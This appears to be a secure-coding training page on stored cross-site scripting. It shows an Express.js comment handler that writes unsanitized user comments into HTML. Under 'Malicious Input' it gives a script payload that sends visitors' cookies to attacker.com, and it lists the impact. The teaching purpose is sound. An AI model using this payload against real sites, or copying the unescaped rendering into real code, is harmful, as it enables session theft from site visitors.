/Code Review/Stored XSS in Comments

Stored XSS in Comments

User comments are stored and displayed to all users without sanitization.

HIGHMedium

Vulnerable Codejavascript

1app.post('/api/comments', async (req, res) => {
2    const { postId, content } = req.body;
3    await db.comments.insert({ postId, content, userId: req.user.id });
4    res.json({ success: true });
5});
6
7app.get('/post/:id', async (req, res) => {
8    const post = await db.posts.findById(req.params.id);
9    const comments = await db.comments.find({ postId: req.params.id });
10    
11    let html = `<h1>${post.title}</h1>`;
12    comments.forEach(c => {
13        html += `<div class="comment">${c.content}</div>`;
14    });
15    res.send(html);
16});

Understanding the Issue

Stored XSS is more dangerous than reflected XSS because the attack persists. Every user who views the page executes the malicious script. Always sanitize output, especially user-generated content from the database.

Persistent Script Injection

Malicious script stored in database affects all viewers

Malicious Input

Comment: <script>new Image().src='https://attacker.com/steal?c='+document.cookie</script>

Impact

✓ Script stored in database
✓ Every visitor's browser executes it
✓ Mass cookie/session theft
✓ Can spread like a worm

Technical Details

Vulnerability Type: Cross-Site Scripting (XSS)
Severity: HIGH
Language: Javascript
CWE: CWE-79
OWASP: A03:2021 - Injection

Stored XSS in Comments

Understanding the Issue

How Attackers Exploit This

Persistent Script Injection

Finding the Vulnerability(3 hints)

Technical Details

Stored XSS in Comments

Understanding the Issue

How Attackers Exploit This

Persistent Script Injection

Finding the Vulnerability(3 hints)

Technical Details